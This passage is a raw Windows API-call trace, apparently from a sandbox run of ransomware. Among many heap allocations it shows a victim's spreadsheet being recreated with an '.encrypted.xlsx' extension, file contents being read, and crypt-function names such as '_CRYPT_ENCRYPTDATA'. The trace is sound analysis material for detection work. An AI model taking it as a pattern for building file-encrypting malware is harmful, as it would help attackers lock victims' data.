| out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmd_cmune5hcq1ezk.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0036.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0036.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.829] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.829] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x9ed1, lpOverlapped=0x0) returned 1 [0036.830] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9ed1) returned 0xac0018 [0036.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9ed1) returned 0xac9ef8 [0036.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0036.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.834] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9ed1) returned 0xac0018 [0036.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0036.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.835] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.835] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.835] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9ed1) returned 0xac0018 [0036.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9ed1) returned 0xad3dd8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.837] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.838] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.838] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.839] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.840] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.841] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 